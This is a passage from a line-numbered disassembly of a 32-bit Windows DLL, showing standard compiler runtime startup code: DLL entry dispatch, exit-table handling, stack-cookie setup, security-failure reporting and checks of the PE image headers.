456 | 10001462: 89 45 0c mov %eax,0xc(%ebp) 457 | 10001465: 85 c0 test %eax,%eax 458 | 10001467: 0f 84 87 00 00 00 je 0x100014f4 459 | 1000146d: ff 35 58 33 00 10 pushl 0x10003358 460 | 10001473: ff d6 call *%esi 461 | 10001475: 8b f8 mov %eax,%edi 462 | 10001477: 8b 45 0c mov 0xc(%ebp),%eax 463 | 1000147a: 59 pop %ecx 464 | 1000147b: 89 45 10 mov %eax,0x10(%ebp) 465 | 1000147e: 89 7d 08 mov %edi,0x8(%ebp) 466 | 10001481: 83 ef 04 sub $0x4,%edi 467 | 10001484: 3b 7d 0c cmp 0xc(%ebp),%edi 468 | 10001487: 72 51 jb 0x100014da 469 | 10001489: 83 3f 00 cmpl $0x0,(%edi) 470 | 1000148c: 74 f3 je 0x10001481 471 | 1000148e: ff 15 68 20 00 10 call *0x10002068 472 | 10001494: 39 07 cmp %eax,(%edi) 473 | 10001496: 74 e9 je 0x10001481 474 | 10001498: ff 37 pushl (%edi) 475 | 1000149a: ff d6 call *%esi 476 | 1000149c: 89 45 f8 mov %eax,-0x8(%ebp) 477 | 1000149f: ff 15 68 20 00 10 call *0x10002068 478 | 100014a5: 89 07 mov %eax,(%edi) 479 | 100014a7: ff 55 f8 call *-0x8(%ebp) 480 | 100014aa: ff 35 5c 33 00 10 pushl 0x1000335c 481 | 100014b0: ff d6 call *%esi 482 | 100014b2: ff 35 58 33 00 10 pushl 0x10003358 483 | 100014b8: 89 45 f8 mov %eax,-0x8(%ebp) 484 | 100014bb: ff d6 call *%esi 485 | 100014bd: 8b 4d f8 mov -0x8(%ebp),%ecx 486 | 100014c0: 83 c4 0c add $0xc,%esp 487 | 100014c3: 39 4d 10 cmp %ecx,0x10(%ebp) 488 | 100014c6: 75 05 jne 0x100014cd 489 | 100014c8: 39 45 08 cmp %eax,0x8(%ebp) 490 | 100014cb: 74 b4 je 0x10001481 491 | 100014cd: 89 4d 10 mov %ecx,0x10(%ebp) 492 | 100014d0: 89 4d 0c mov %ecx,0xc(%ebp) 493 | 100014d3: 89 45 08 mov %eax,0x8(%ebp) 494 | 100014d6: 8b f8 mov %eax,%edi 495 | 100014d8: eb a7 jmp 0x10001481 496 | 100014da: ff 75 0c pushl 0xc(%ebp) 497 | 100014dd: ff 15 6c 20 00 10 call *0x1000206c 498 | 100014e3: 59 pop %ecx 499 | 100014e4: ff 15 68 20 00 10 call *0x10002068 500 | 100014ea: a3 58 33 00 10 mov %eax,0x10003358 501 | 100014ef: a3 5c 33 00 10 mov %eax,0x1000335c 502 | 100014f4: 33 c0 xor %eax,%eax 503 | 100014f6: a3 50 33 00 10 mov %eax,0x10003350 504 | 100014fb: 39 45 fc cmp %eax,-0x4(%ebp) 505 | 100014fe: 75 08 jne 0x10001508 506 | 10001500: 50 push %eax 507 | 10001501: 53 push %ebx 508 | 10001502: ff 15 2c 20 00 10 call *0x1000202c 509 | 10001508: 33 c0 xor %eax,%eax 510 | 1000150a: 40 inc %eax 511 | 1000150b: 5f pop %edi 512 | 1000150c: 5e pop %esi 513 | 1000150d: 5b pop %ebx 514 | 1000150e: c9 leave 515 | 1000150f: c2 0c 00 ret $0xc 516 | 10001512: 6a 10 push $0x10 517 | 10001514: 68 a8 21 00 10 push $0x100021a8 518 | 10001519: e8 ba 04 00 00 call 0x100019d8 519 | 1000151e: 8b f9 mov %ecx,%edi 520 | 10001520: 8b f2 mov %edx,%esi 521 | 10001522: 8b 5d 08 mov 0x8(%ebp),%ebx 522 | 10001525: 33 c0 xor %eax,%eax 523 | 10001527: 40 inc %eax 524 | 10001528: 89 45 e4 mov %eax,-0x1c(%ebp) 525 | 1000152b: 33 c9 xor %ecx,%ecx 526 | 1000152d: 89 4d fc mov %ecx,-0x4(%ebp) 527 | 10001530: 89 35 08 30 00 10 mov %esi,0x10003008 528 | 10001536: 89 45 fc mov %eax,-0x4(%ebp) 529 | 10001539: 3b f1 cmp %ecx,%esi 530 | 1000153b: 75 10 jne 0x1000154d 531 | 1000153d: 39 0d 10 30 00 10 cmp %ecx,0x10003010 532 | 10001543: 75 08 jne 0x1000154d 533 | 10001545: 89 4d e4 mov %ecx,-0x1c(%ebp) 534 | 10001548: e9 b7 00 00 00 jmp 0x10001604 535 | 1000154d: 3b f0 cmp %eax,%esi 536 | 1000154f: 74 05 je 0x10001556 537 | 10001551: 83 fe 02 cmp $0x2,%esi 538 | 10001554: 75 2e jne 0x10001584 539 | 10001556: a1 bc 20 00 10 mov 0x100020bc,%eax 540 | 1000155b: 3b c1 cmp %ecx,%eax 541 | 1000155d: 74 08 je 0x10001567 542 | 1000155f: 57 push %edi 543 | 10001560: 56 push %esi 544 | 10001561: 53 push %ebx 545 | 10001562: ff d0 call *%eax 546 | 10001564: 89 45 e4 mov %eax,-0x1c(%ebp) 547 | 10001567: 83 7d e4 00 cmpl $0x0,-0x1c(%ebp) 548 | 1000156b: 0f 84 93 00 00 00 je 0x10001604 549 | 10001571: 57 push %edi 550 | 10001572: 56 push %esi 551 | 10001573: 53 push %ebx 552 | 10001574: e8 73 fd ff ff call 0x100012ec 553 | 10001579: 89 45 e4 mov %eax,-0x1c(%ebp) 554 | 1000157c: 85 c0 test %eax,%eax 555 | 1000157e: 0f 84 80 00 00 00 je 0x10001604 556 | 10001584: 57 push %edi 557 | 10001585: 56 push %esi 558 | 10001586: 53 push %ebx 559 | 10001587: e8 74 fa ff ff call 0x10001000 560 | 1000158c: 89 45 e4 mov %eax,-0x1c(%ebp) 561 | 1000158f: 83 fe 01 cmp $0x1,%esi 562 | 10001592: 75 24 jne 0x100015b8 563 | 10001594: 85 c0 test %eax,%eax 564 | 10001596: 75 20 jne 0x100015b8 565 | 10001598: 57 push %edi 566 | 10001599: 50 push %eax 567 | 1000159a: 53 push %ebx 568 | 1000159b: e8 60 fa ff ff call 0x10001000 569 | 100015a0: 57 push %edi 570 | 100015a1: 6a 00 push $0x0 571 | 100015a3: 53 push %ebx 572 | 100015a4: e8 43 fd ff ff call 0x100012ec 573 | 100015a9: a1 bc 20 00 10 mov 0x100020bc,%eax 574 | 100015ae: 85 c0 test %eax,%eax 575 | 100015b0: 74 06 je 0x100015b8 576 | 100015b2: 57 push %edi 577 | 100015b3: 6a 00 push $0x0 578 | 100015b5: 53 push %ebx 579 | 100015b6: ff d0 call *%eax 580 | 100015b8: 85 f6 test %esi,%esi 581 | 100015ba: 74 05 je 0x100015c1 582 | 100015bc: 83 fe 03 cmp $0x3,%esi 583 | 100015bf: 75 43 jne 0x10001604 584 | 100015c1: 57 push %edi 585 | 100015c2: 56 push %esi 586 | 100015c3: 53 push %ebx 587 | 100015c4: e8 23 fd ff ff call 0x100012ec 588 | 100015c9: 85 c0 test %eax,%eax 589 | 100015cb: 75 03 jne 0x100015d0 590 | 100015cd: 21 45 e4 and %eax,-0x1c(%ebp) 591 | 100015d0: 83 7d e4 00 cmpl $0x0,-0x1c(%ebp) 592 | 100015d4: 74 2e je 0x10001604 593 | 100015d6: a1 bc 20 00 10 mov 0x100020bc,%eax 594 | 100015db: 85 c0 test %eax,%eax 595 | 100015dd: 74 25 je 0x10001604 596 | 100015df: 57 push %edi 597 | 100015e0: 56 push %esi 598 | 100015e1: 53 push %ebx 599 | 100015e2: ff d0 call *%eax 600 | 100015e4: 89 45 e4 mov %eax,-0x1c(%ebp) 601 | 100015e7: eb 1b jmp 0x10001604 602 | 100015e9: 8b 45 ec mov -0x14(%ebp),%eax 603 | 100015ec: 8b 08 mov (%eax),%ecx 604 | 100015ee: 8b 09 mov (%ecx),%ecx 605 | 100015f0: 89 4d e0 mov %ecx,-0x20(%ebp) 606 | 100015f3: 50 push %eax 607 | 100015f4: 51 push %ecx 608 | 100015f5: e8 d6 03 00 00 call 0x100019d0 609 | 100015fa: 59 pop %ecx 610 | 100015fb: 59 pop %ecx 611 | 100015fc: c3 ret 612 | 100015fd: 8b 65 e8 mov -0x18(%ebp),%esp 613 | 10001600: 83 65 e4 00 andl $0x0,-0x1c(%ebp) 614 | 10001604: 83 65 fc 00 andl $0x0,-0x4(%ebp) 615 | 10001608: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 616 | 1000160f: e8 09 00 00 00 call 0x1000161d 617 | 10001614: 8b 45 e4 mov -0x1c(%ebp),%eax 618 | 10001617: e8 01 04 00 00 call 0x10001a1d 619 | 1000161c: c3 ret 620 | 1000161d: c7 05 08 30 00 10 ff movl $0xffffffff,0x10003008 621 | 10001624: ff ff ff 622 | 10001627: c3 ret 623 | 10001628: 8b ff mov %edi,%edi 624 | 1000162a: 55 push %ebp 625 | 1000162b: 8b ec mov %esp,%ebp 626 | 1000162d: 83 7d 0c 01 cmpl $0x1,0xc(%ebp) 627 | 10001631: 75 05 jne 0x10001638 628 | 10001633: e8 1e 04 00 00 call 0x10001a56 629 | 10001638: ff 75 08 pushl 0x8(%ebp) 630 | 1000163b: 8b 4d 10 mov 0x10(%ebp),%ecx 631 | 1000163e: 8b 55 0c mov 0xc(%ebp),%edx 632 | 10001641: e8 cc fe ff ff call 0x10001512 633 | 10001646: 59 pop %ecx 634 | 10001647: 5d pop %ebp 635 | 10001648: c2 0c 00 ret $0xc 636 | 1000164b: 8b ff mov %edi,%edi 637 | 1000164d: 55 push %ebp 638 | 1000164e: 8b ec mov %esp,%ebp 639 | 10001650: 81 ec 28 03 00 00 sub $0x328,%esp 640 | 10001656: a3 20 31 00 10 mov %eax,0x10003120 641 | 1000165b: 89 0d 1c 31 00 10 mov %ecx,0x1000311c 642 | 10001661: 89 15 18 31 00 10 mov %edx,0x10003118 643 | 10001667: 89 1d 14 31 00 10 mov %ebx,0x10003114 644 | 1000166d: 89 35 10 31 00 10 mov %esi,0x10003110 645 | 10001673: 89 3d 0c 31 00 10 mov %edi,0x1000310c 646 | 10001679: 66 data16 647 | 1000167a: 8c 15 38 31 00 10 mov %ss,0x10003138 648 | 10001680: 66 data16 649 | 10001681: 8c 0d 2c 31 00 10 mov %cs,0x1000312c 650 | 10001687: 66 data16 651 | 10001688: 8c 1d 08 31 00 10 mov %ds,0x10003108 652 | 1000168e: 66 data16 653 | 1000168f: 8c 05 04 31 00 10 mov %es,0x10003104 654 | 10001695: 66 data16 655 | 10001696: 8c 25 00 31 00 10 mov %fs,0x10003100 656 | 1000169c: 66 data16 657 | 1000169d: 8c 2d fc 30 00 10 mov %gs,0x100030fc 658 | 100016a3: 9c pushf 659 | 100016a4: 8f 05 30 31 00 10 popl 0x10003130 660 | 100016aa: 8b 45 00 mov 0x0(%ebp),%eax 661 | 100016ad: a3 24 31 00 10 mov %eax,0x10003124 662 | 100016b2: 8b 45 04 mov 0x4(%ebp),%eax 663 | 100016b5: a3 28 31 00 10 mov %eax,0x10003128 664 | 100016ba: 8d 45 08 lea 0x8(%ebp),%eax 665 | 100016bd: a3 34 31 00 10 mov %eax,0x10003134 666 | 100016c2: 8b 85 e0 fc ff ff mov -0x320(%ebp),%eax 667 | 100016c8: c7 05 70 30 00 10 01 movl $0x10001,0x10003070 668 | 100016cf: 00 01 00 669 | 100016d2: a1 28 31 00 10 mov 0x10003128,%eax 670 | 100016d7: a3 24 30 00 10 mov %eax,0x10003024 671 | 100016dc: c7 05 18 30 00 10 09 movl $0xc0000409,0x10003018 672 | 100016e3: 04 00 c0 673 | 100016e6: c7 05 1c 30 00 10 01 movl $0x1,0x1000301c 674 | 100016ed: 00 00 00 675 | 100016f0: a1 00 30 00 10 mov 0x10003000,%eax 676 | 100016f5: 89 85 d8 fc ff ff mov %eax,-0x328(%ebp) 677 | 100016fb: a1 04 30 00 10 mov 0x10003004,%eax 678 | 10001700: 89 85 dc fc ff ff mov %eax,-0x324(%ebp) 679 | 10001706: ff 15 10 20 00 10 call *0x10002010 680 | 1000170c: a3 68 30 00 10 mov %eax,0x10003068 681 | 10001711: 6a 01 push $0x1 682 | 10001713: e8 d4 03 00 00 call 0x10001aec 683 | 10001718: 59 pop %ecx 684 | 10001719: 6a 00 push $0x0 685 | 1000171b: ff 15 14 20 00 10 call *0x10002014 686 | 10001721: 68 c0 20 00 10 push $0x100020c0 687 | 10001726: ff 15 18 20 00 10 call *0x10002018 688 | 1000172c: 83 3d 68 30 00 10 00 cmpl $0x0,0x10003068 689 | 10001733: 75 08 jne 0x1000173d 690 | 10001735: 6a 01 push $0x1 691 | 10001737: e8 b0 03 00 00 call 0x10001aec 692 | 1000173c: 59 pop %ecx 693 | 1000173d: 68 09 04 00 c0 push $0xc0000409 694 | 10001742: ff 15 1c 20 00 10 call *0x1000201c 695 | 10001748: 50 push %eax 696 | 10001749: ff 15 20 20 00 10 call *0x10002020 697 | 1000174f: c9 leave 698 | 10001750: c3 ret 699 | 10001751: 68 40 33 00 10 push $0x10003340 700 | 10001756: e8 97 03 00 00 call 0x10001af2 701 | 1000175b: 59 pop %ecx 702 | 1000175c: c3 ret 703 | 1000175d: 6a 14 push $0x14 704 | 1000175f: 68 d0 21 00 10 push $0x100021d0 705 | 10001764: e8 6f 02 00 00 call 0x100019d8 706 | 10001769: ff 35 5c 33 00 10 pushl 0x1000335c 707 | 1000176f: 8b 35 64 20 00 10 mov 0x10002064,%esi 708 | 10001775: ff d6 call *%esi 709 | 10001777: 59 pop %ecx 710 | 10001778: 89 45 e4 mov %eax,-0x1c(%ebp) 711 | 1000177b: 83 f8 ff cmp $0xffffffff,%eax 712 | 1000177e: 75 0c jne 0x1000178c 713 | 10001780: ff 75 08 pushl 0x8(%ebp) 714 | 10001783: ff 15 74 20 00 10 call *0x10002074 715 | 10001789: 59 pop %ecx 716 | 1000178a: eb 67 jmp 0x100017f3 717 | 1000178c: 6a 08 push $0x8 718 | 1000178e: e8 71 03 00 00 call 0x10001b04 719 | 10001793: 59 pop %ecx 720 | 10001794: 83 65 fc 00 andl $0x0,-0x4(%ebp) 721 | 10001798: ff 35 5c 33 00 10 pushl 0x1000335c 722 | 1000179e: ff d6 call *%esi 723 | 100017a0: 89 45 e4 mov %eax,-0x1c(%ebp) 724 | 100017a3: ff 35 58 33 00 10 pushl 0x10003358 725 | 100017a9: ff d6 call *%esi 726 | 100017ab: 59 pop %ecx 727 | 100017ac: 59 pop %ecx 728 | 100017ad: 89 45 e0 mov %eax,-0x20(%ebp) 729 | 100017b0: 8d 45 e0 lea -0x20(%ebp),%eax 730 | 100017b3: 50 push %eax 731 | 100017b4: 8d 45 e4 lea -0x1c(%ebp),%eax 732 | 100017b7: 50 push %eax 733 | 100017b8: ff 75 08 pushl 0x8(%ebp) 734 | 100017bb: 8b 35 78 20 00 10 mov 0x10002078,%esi 735 | 100017c1: ff d6 call *%esi 736 | 100017c3: 59 pop %ecx 737 | 100017c4: 50 push %eax 738 | 100017c5: e8 34 03 00 00 call 0x10001afe 739 | 100017ca: 89 45 dc mov %eax,-0x24(%ebp) 740 | 100017cd: ff 75 e4 pushl -0x1c(%ebp) 741 | 100017d0: ff d6 call *%esi 742 | 100017d2: a3 5c 33 00 10 mov %eax,0x1000335c 743 | 100017d7: ff 75 e0 pushl -0x20(%ebp) 744 | 100017da: ff d6 call *%esi 745 | 100017dc: 83 c4 14 add $0x14,%esp 746 | 100017df: a3 58 33 00 10 mov %eax,0x10003358 747 | 100017e4: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 748 | 100017eb: e8 09 00 00 00 call 0x100017f9 749 | 100017f0: 8b 45 dc mov -0x24(%ebp),%eax 750 | 100017f3: e8 25 02 00 00 call 0x10001a1d 751 | 100017f8: c3 ret 752 | 100017f9: 6a 08 push $0x8 753 | 100017fb: e8 f8 02 00 00 call 0x10001af8 754 | 10001800: 59 pop %ecx 755 | 10001801: c3 ret 756 | 10001802: 8b ff mov %edi,%edi 757 | 10001804: 55 push %ebp 758 | 10001805: 8b ec mov %esp,%ebp 759 | 10001807: ff 75 08 pushl 0x8(%ebp) 760 | 1000180a: e8 4e ff ff ff call 0x1000175d 761 | 1000180f: f7 d8 neg %eax 762 | 10001811: 1b c0 sbb %eax,%eax 763 | 10001813: f7 d8 neg %eax 764 | 10001815: 59 pop %ecx 765 | 10001816: 48 dec %eax 766 | 10001817: 5d pop %ebp 767 | 10001818: c3 ret 768 | 10001819: 8b ff mov %edi,%edi 769 | 1000181b: 56 push %esi 770 | 1000181c: b8 98 21 00 10 mov $0x10002198,%eax 771 | 10001821: be 98 21 00 10 mov $0x10002198,%esi 772 | 10001826: 57 push %edi 773 | 10001827: 8b f8 mov %eax,%edi 774 | 10001829: 3b c6 cmp %esi,%eax 775 | 1000182b: 73 0f jae 0x1000183c 776 | 1000182d: 8b 07 mov (%edi),%eax 777 | 1000182f: 85 c0 test %eax,%eax 778 | 10001831: 74 02 je 0x10001835 779 | 10001833: ff d0 call *%eax 780 | 10001835: 83 c7 04 add $0x4,%edi 781 | 10001838: 3b fe cmp %esi,%edi 782 | 1000183a: 72 f1 jb 0x1000182d 783 | 1000183c: 5f pop %edi 784 | 1000183d: 5e pop %esi 785 | 1000183e: c3 ret 786 | 1000183f: 8b ff mov %edi,%edi 787 | 10001841: 56 push %esi 788 | 10001842: b8 a0 21 00 10 mov $0x100021a0,%eax 789 | 10001847: be a0 21 00 10 mov $0x100021a0,%esi 790 | 1000184c: 57 push %edi 791 | 1000184d: 8b f8 mov %eax,%edi 792 | 1000184f: 3b c6 cmp %esi,%eax 793 | 10001851: 73 0f jae 0x10001862 794 | 10001853: 8b 07 mov (%edi),%eax 795 | 10001855: 85 c0 test %eax,%eax 796 | 10001857: 74 02 je 0x1000185b 797 | 10001859: ff d0 call *%eax 798 | 1000185b: 83 c7 04 add $0x4,%edi 799 | 1000185e: 3b fe cmp %esi,%edi 800 | 10001860: 72 f1 jb 0x10001853 801 | 10001862: 5f pop %edi 802 | 10001863: 5e pop %esi 803 | 10001864: c3 ret 804 | 10001865: cc int3 805 | 10001866: cc int3 806 | 10001867: cc int3 807 | 10001868: cc int3 808 | 10001869: cc int3 809 | 1000186a: cc int3 810 | 1000186b: cc int3 811 | 1000186c: cc int3 812 | 1000186d: cc int3 813 | 1000186e: cc int3 814 | 1000186f: cc int3 815 | 10001870: 8b ff mov %edi,%edi 816 | 10001872: 55 push %ebp 817 | 10001873: 8b ec mov %esp,%ebp 818 | 10001875: 8b 4d 08 mov 0x8(%ebp),%ecx 819 | 10001878: b8 4d 5a 00 00 mov $0x5a4d,%eax 820 | 1000187d: 66 39 01 cmp %ax,(%ecx) 821 | 10001880: 74 04 je 0x10001886 822 | 10001882: 33 c0 xor %eax,%eax 823 | 10001884: 5d pop %ebp 824 | 10001885: c3 ret 825 | 10001886: 8b 41 3c mov 0x3c(%ecx),%eax 826 | 10001889: 03 c1 add %ecx,%eax 827 | 1000188b: 81 38 50 45 00 00 cmpl $0x4550,(%eax) 828 | 10001891: 75 ef jne 0x10001882 829 | 10001893: 33 d2 xor %edx,%edx 830 | 10001895: b9 0b 01 00 00 mov $0x10b,%ecx 831 | 1000189a: 66 39 48 18 cmp %cx,0x18(%eax) 832 | 1000189e: 0f 94 c2 sete %dl 833 | 100018a1: 8b c2 mov %edx,%eax 834 | 100018a3: 5d pop %ebp 835 | 100018a4: c3 ret 836 | 100018a5: cc int3 837 | 100018a6: cc int3 838 | 100018a7: cc int3 839 | 100018a8: cc int3 840 | 100018a9: cc int3 841 | 100018aa: cc int3 842 | 100018ab: cc int3 843 | 100018ac: cc int3 844 | 100018ad: cc int3 845 | 100018ae: cc int3 846 | 100018af: cc int3 847 | 100018b0: 8b ff mov %edi,%edi 848 | 100018b2: 55 push %ebp 849 | 100018b3: 8b ec mov %esp,%ebp 850 | 100018b5: 8b 45 08 mov 0x8(%ebp),%eax 851 | 100018b8: 8b 48 3c mov 0x3c(%eax),%ecx 852 | 100018bb: 03 c8 add %eax,%ecx 853 | 100018bd: 0f b7 41 14 movzwl 0x14(%ecx),%eax 854 | 100018c1: 53 push %ebx 855 | 100018c2: 56 push %esi 856 | 100018c3: 0f b7 71 06 movzwl 0x6(%ecx),%esi 857 | 100018c7: 33 d2 xor %edx,%edx 858 | 100018c9: 57 push %edi 859 | 100018ca: 8d 44 08 18 lea 0x18(%eax,%ecx,1),%eax 860 | 100018ce: 85 f6 test %esi,%esi 861 | 100018d0: 76 1b jbe 0x100018ed 862 | 100018d2: 8b 7d 0c mov 0xc(%ebp),%edi 863 | 100018d5: 8b 48 0c mov 0xc(%eax),%ecx 864 | 100018d8: 3b f9 cmp %ecx,%edi 865 | 100018da: 72 09 jb 0x100018e5 866 | 100018dc: 8b 58 08 mov 0x8(%eax),%ebx 867 | 100018df: 03 d9 add %ecx,%ebx 868 | 100018e1: 3b fb cmp %ebx,%edi 869 | 100018e3: 72 0a jb 0x100018ef 870 | 100018e5: 42 inc %edx 871 | 100018e6: 83 c0 28 add $0x28,%eax 872 | 100018e9: 3b d6 cmp %esi,%edx 873 | 100018eb: 72 e8 jb 0x100018d5 874 | 100018ed: 33 c0 xor %eax,%eax 875 | 100018ef: 5f pop %edi 876 | 100018f0: 5e pop %esi 877 | 100018f1: 5b pop %ebx 878 | 100018f2: 5d pop %ebp 879 | 100018f3: c3 ret 880 | 100018f4: cc int3 881 | 100018f5: cc int3 882 | 100018f6: cc int3 883 | 100018f7: cc int3 884 | 100018f8: cc int3 885 | 100018f9: cc int3 886 | 100018fa: cc int3 887 | 100018fb: cc int3 888 | 100018fc: cc int3 889 | 100018fd: cc int3 890 | 100018fe: cc int3 891 | 100018ff: cc int3 892 | 10001900: 8b ff mov %edi,%edi 893 | 10001902: 55 push %ebp 894 | 10001903: 8b ec mov %esp,%ebp 895 | 10001905: 6a fe push $0xfffffffe 896 | 10001907: 68 f0 21 00 10 push $0x100021f0 897 | 1000190c: 68 31 1a 00 10 push $0x10001a31 898 | 10001911: 64 a1 00 00 00 00 mov %fs:0x0,%eax 899 | 10001917: 50 push %eax 900 | 10001918: 83 ec 08 sub $0x8,%esp 901 | 1000191b: 53 push %ebx 902 | 1000191c: 56 push %esi 903 | 1000191d: 57 push %edi 904 | 1000191e: a1 00 30 00 10 mov 0x10003000,%eax 905 | 10001923: 31 45 f8 xor %eax,-0x8(%ebp) 906 | 10001926: 33 c5 xor %ebp,%eax 907 | 10001928: 50 push %eax 908 | 10001929: 8d 45 f0 lea -0x10(%ebp),%eax 909 | 1000192c: 64 a3 00 00 00 00 mov %eax,%fs:0x0 910 | 10001932: 89 65 e8 mov %esp,-0x18(%ebp) 911 | 10001935: c7 45 fc 00 00 00 00 movl $0x0,-0x4(%ebp) 912 | 1000193c: 68 00 00 00 10 push $0x10000000 913 | 10001941: e8 2a ff ff ff call 0x10001870 914 | 10001946: 83 c4 04 add $0x4,%esp 915 | 10001949: 85 c0 test %eax,%eax 916 | 1000194b: 74 55 je 0x100019a2 917 | 1000194d: 8b 45 08 mov 0x8(%ebp),%eax 918 | 10001950: 2d 00 00 00 10 sub $0x10000000,%eax 919 | 10001955: 50 push %eax 920 | 10001956: 68 00 00 00 10 push $0x10000000 921 | 1000195b: e8 50 ff ff ff call 0x100018b0 922 | 10001960: 83 c4 08 add $0x8,%esp 923 | 10001963: 85 c0 test %eax,%eax 924 | 10001965: 74 3b je 0x100019a2 925 | 10001967: 8b 40 24 mov 0x24(%eax),%eax 926 | 1000196a: c1 e8 1f shr $0x1f,%eax 927 | 1000196d: f7 d0 not %eax 928 | 1000196f: 83 e0 01 and $0x1,%eax 929 | 10001972: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 930 | 10001979: 8b 4d f0 mov -0x10(%ebp),%ecx 931 | 1000197c: 64 89 0d 00 00 00 00 mov %ecx,%fs:0x0 932 | 10001983: 59 pop %ecx 933 | 10001984: 5f pop %edi 934 | 10001985: 5e pop %esi 935 | 10001986: 5b pop %ebx 936 | 10001987: 8b e5 mov %ebp,%esp 937 | 10001989: 5d pop %ebp 938 | 1000198a: c3 ret 939 | 1000198b: 8b 45 ec mov -0x14(%ebp),%eax 940 | 1000198e: 8b 08 mov (%eax),%ecx 941 | 10001990: 8b 01 mov (%ecx),%eax 942 | 10001992: 33 d2 xor %edx,%edx 943 | 10001994: 3d 05 00 00 c0 cmp $0xc0000005,%eax 944 | 10001999: 0f 94 c2 sete %dl 945 | 1000199c: 8b c2 mov %edx,%eax 946 | 1000199e: c3 ret 947 | 1000199f: 8b 65 e8 mov -0x18(%ebp),%esp 948 | 100019a2: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 949 | 100019a9: 33 c0 xor %eax,%eax 950 | 100019ab: 8b 4d f0 mov -0x10(%ebp),%ecx 951 | 100019ae: 64 89 0d 00 00 00 00 mov %ecx,%fs:0x0 952 | 100019b5: 59 pop %ecx 953 | 100019b6: 5f pop %edi 954 | 100019b7: 5e pop %esi 955 | 100019b8: 5b pop %ebx 956 | 100019b9: 8b e5 mov %ebp,%esp 957 | 100019bb: 5d pop %ebp 958 | 100019bc: c3 ret 959 | 100019bd: cc int3 960 | 100019be: ff 25 60 20 00 10 jmp *0x10002060 961 | 100019c4: ff 25 5c 20 00 10 jmp *0x1000205c 962 | 100019ca: ff 25 58 20 00 10 jmp *0x10002058 963 | 100019d0: ff 25 50 20 00 10 jmp *0x10002050 964 | 100019d6: cc int3 965 | 100019d7: cc int3 966 | 100019d8: 68 31 1a 00 10 push $0x10001a31 967 | 100019dd: 64 ff 35 00 00 00 00 pushl %fs:0x0 968 | 100019e4: 8b 44 24 10 mov 0x10(%esp),%eax 969 | 100019e8: 89 6c 24 10 mov %ebp,0x10(%esp) 970 | 100019ec: 8d 6c 24 10 lea 0x10(%esp),%ebp 971 | 100019f0: 2b e0 sub %eax,%esp 972 | 100019f2: 53 push %ebx 973 | 100019f3: 56 push %esi 974 | 100019f4: 57 push %edi 975 | 100019f5: a1 00 30 00 10 mov 0x10003000,%eax 976 | 100019fa: 31 45 fc xor %eax,-0x4(%ebp) 977 | 100019fd: 33 c5 xor %ebp,%eax 978 | 100019ff: 50 push %eax 979 | 10001a00: 89 65 e8 mov %esp,-0x18(%ebp) 980 | 10001a03: ff 75 f8 pushl -0x8(%ebp) 981 | 10001a06: 8b 45 fc mov -0x4(%ebp),%eax 982 | 10001a09: c7 45 fc fe ff ff ff movl $0xfffffffe,-0x4(%ebp) 983 | 10001a10: 89 45 f8 mov %eax,-0x8(%ebp) 984 | 10001a13: 8d 45 f0 lea -0x10(%ebp),%eax 985 | 10001a16: 64 a3 00 00 00 00 mov %eax,%fs:0x0 986 | 10001a1c: c3 ret 987 | 10001a1d: 8b 4d f0 mov -0x10(%ebp),%ecx 988 | 10001a20: 64 89 0d 00 00 00 00 mov %ecx,%fs:0x0 989 | 10001a27: 59 pop %ecx 990 | 10001a28: 5f pop %edi 991 | 10001a29: 5f pop %edi 992 | 10001a2a: 5e pop %esi 993 | 10001a2b: 5b pop %ebx 994 | 10001a2c: 8b e5 mov %ebp,%esp 995 | 10001a2e: 5d pop %ebp 996 | 10001a2f: 51 push %ecx 997 | 10001a30: c3 ret 998 | 10001a31: 8b ff mov %edi,%edi 999 | 10001a33: 55 push %ebp 1000 | 10001a34: 8b ec mov %esp,%ebp 1001 | 10001a36: ff 75 14 pushl 0x14(%ebp) 1002 | 10001a39: ff 75 10 pushl 0x10(%ebp) 1003 | 10001a3c: ff 75 0c pushl 0xc(%ebp) 1004 | 10001a3f: ff 75 08 pushl 0x8(%ebp) 1005 | 10001a42: 68 8e 12 00 10 push $0x1000128e 1006 | 10001a47: 68 00 30 00 10 push $0x10003000 1007 | 10001a4c: e8 b9 00 00 00 call 0x10001b0a 1008 | 10001a51: 83 c4 18 add $0x18,%esp 1009 | 10001a54: 5d pop %ebp 1010 | 10001a55: c3 ret 1011 | 10001a56: 8b ff mov %edi,%edi 1012 | 10001a58: 55 push %ebp 1013 | 10001a59: 8b ec mov %esp,%ebp 1014 | 10001a5b: 83 ec 10 sub $0x10,%esp 1015 | 10001a5e: a1 00 30 00 10 mov 0x10003000,%eax 1016 | 10001a63: 83 65 f8 00 andl $0x0,-0x8(%ebp) 1017 | 10001a67: 83 65 fc 00 andl $0x0,-0x4(%ebp) 1018 | 10001a6b: 53 push %ebx 1019 | 10001a6c: 57 push %edi 1020 | 10001a6d: bf 4e e6 40 bb mov $0xbb40e64e,%edi 1021 | 10001a72: bb 00 00 ff ff mov $0xffff0000,%ebx 1022 | 10001a77: 3b c7 cmp %edi,%eax 1023 | 10001a79: 74 0d je 0x10001a88 1024 | 10001a7b: 85 c3 test %eax,%ebx 1025 | 10001a7d: 74 09 je 0x10001a88 1026 | 10001a7f: f7 d0 not %eax 1027 | 10001a81: a3 04 30 00 10 mov %eax,0x10003004 1028 | 10001a86: eb 60 jmp 0x10001ae8 1029 | 10001a88: 56 push %esi 1030 | 10001a89: 8d 45 f8 lea -0x8(%ebp),%eax 1031 | 10001a8c: 50 push %eax 1032 | 10001a8d: ff 15 30 20 00 10 call *0x10002030 1033 | 10001a93: 8b 75 fc mov -0x4(%ebp),%esi 1034 | 10001a96: 33 75 f8 xor -0x8(%ebp),%esi 1035 | 10001a99: ff 15 00 20 00 10 call *0x10002000 1036 | 10001a9f: 33 f0 xor %eax,%esi 1037 | 10001aa1: ff 15 04 20 00 10 call *0x10002004 1038 | 10001aa7: 33 f0 xor %eax,%esi 1039 | 10001aa9: ff 15 08 20 00 10 call *0x10002008 1040 | 10001aaf: 33 f0 xor %eax,%esi 1041 | 10001ab1: 8d 45 f0 lea -0x10(%ebp),%eax 1042 | 10001ab4: 50 push %eax 1043 | 10001ab5: ff 15 0c 20 00 10 call *0x1000200c 1044 | 10001abb: 8b 45 f4 mov -0xc(%ebp),%eax 1045 | 10001abe: 33 45 f0 xor -0x10(%ebp),%eax 1046 | 10001ac1: 33 f0 xor %eax,%esi 1047 | 